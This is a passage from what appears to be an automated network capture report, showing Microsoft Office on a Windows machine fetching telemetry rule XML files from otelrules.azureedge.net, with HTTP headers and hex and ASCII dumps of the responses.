                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:01 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                        x-ms-request-id: f7184125-501e-0064-68d4-451f54000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125401Z-1746fd949bdzd2qvhC1EWRcygw000000010g0000000046km
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        125192.168.2.74985213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:02 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                        x-ms-request-id: 8863b02e-001e-008d-5ccb-45d91e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125402Z-1746fd949bdfg4slhC1EWR34t00000000140000000005p7y
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        126192.168.2.74985313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:02 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                        x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125402Z-1746fd949bd9x4mhhC1EWRb76n00000001b0000000002vbw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        127192.168.2.74985413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:02 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                        x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125402Z-1746fd949bd9x4mhhC1EWRb76n000000018g00000000753y
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:03 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        128192.168.2.74985513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:02 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:02 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                        x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125402Z-1746fd949bdfg4slhC1EWR34t0000000010g00000000aap5
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:03 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        129192.168.2.74985613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:03 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:04 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                        x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125404Z-1746fd949bddtfvqhC1EWRxbpg0000000140000000008cz1
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        130192.168.2.74985713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:04 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                        x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125404Z-1746fd949bddgsvjhC1EWRum2c00000001cg00000000bfv6
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        131192.168.2.74985813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:04 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                        x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125404Z-1746fd949bd6ztf6hC1EWRvq2s00000000v000000000802a
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:05 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        132192.168.2.74985913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:05 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1354
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                        x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125405Z-1746fd949bd7wvgbhC1EWR0rgs000000017g000000008w3v
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:05 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        133192.168.2.74986013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:05 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                        x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125405Z-1746fd949bdb8xvchC1EWRmbd40000000170000000004rht
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
